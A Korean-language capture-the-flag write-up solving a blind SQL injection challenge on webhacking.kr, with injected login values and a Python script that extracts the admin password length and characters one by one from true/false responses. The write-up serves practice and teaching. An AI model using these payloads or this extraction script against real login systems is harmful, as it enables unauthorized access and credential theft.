[webhacking.kr] old-23 blind SQL injection

https://webhacking.kr/challenge/bonus-1/index.php 

Challenge 21

 

 

문제 분석

id: admin, pw: admin => login fail

id: admin, pw: asdf => login fail

id: a, pw: a => login fail

id: guest, pw: guest => login success

id: guest, pw: a => login fail

id: a, pw: guest => login fail

id: guest, pw: 'or 1=1 => wrong password

 

TRUE => wrong password, FALSE => login fail

 

ID 찾기

id는 admin 일꺼라 생각하고 맨 첫글자가 a 인것만 확인했다.

id : admin' and ord(substr(id, 1, 1))=97 #

pw : a

=> wrong password

 

id = admin 일 확률 98%

 

PW 찾기

pw는 python으로 자동화 하여 찾았다.

import requests

url = "https://webhacking.kr/challenge/bonus-1/index.php"

# find pw_len
pw_len = 1
while True:
    params = {'id':f"admin' and length(pw)={pw_len} #", "pw":"1"}
    req = requests.get(url, params)
    if ("wrong password" in req.text):
    	print("password length is : " + str(pw_len))
    	break;
    print(pw_len)
    pw_len += 1

# find password
password = ""
for i in range(1, pw_len +1):
    for c in range(0, 128):
        params = {'id':f"admin' and ord(substr(pw, {i}, 1))={c} #", 'pw':"a"}
        req = requests.get(url, params)
        if ("wrong password" in req.text):
            password += chr(c)
            print("password: " + password)
            break

and와 or 연산자 우선순위가 헷갈려 시간이 좀 걸렸다. and가 먼저다. 

 

length(pw)가 10이라고 가정하면

select ~~~ where id='admin' and pw='1' or length(pw)=10 # (x)

select ~~~ where id='admin' and length(pw)=10 # pw="1" (o)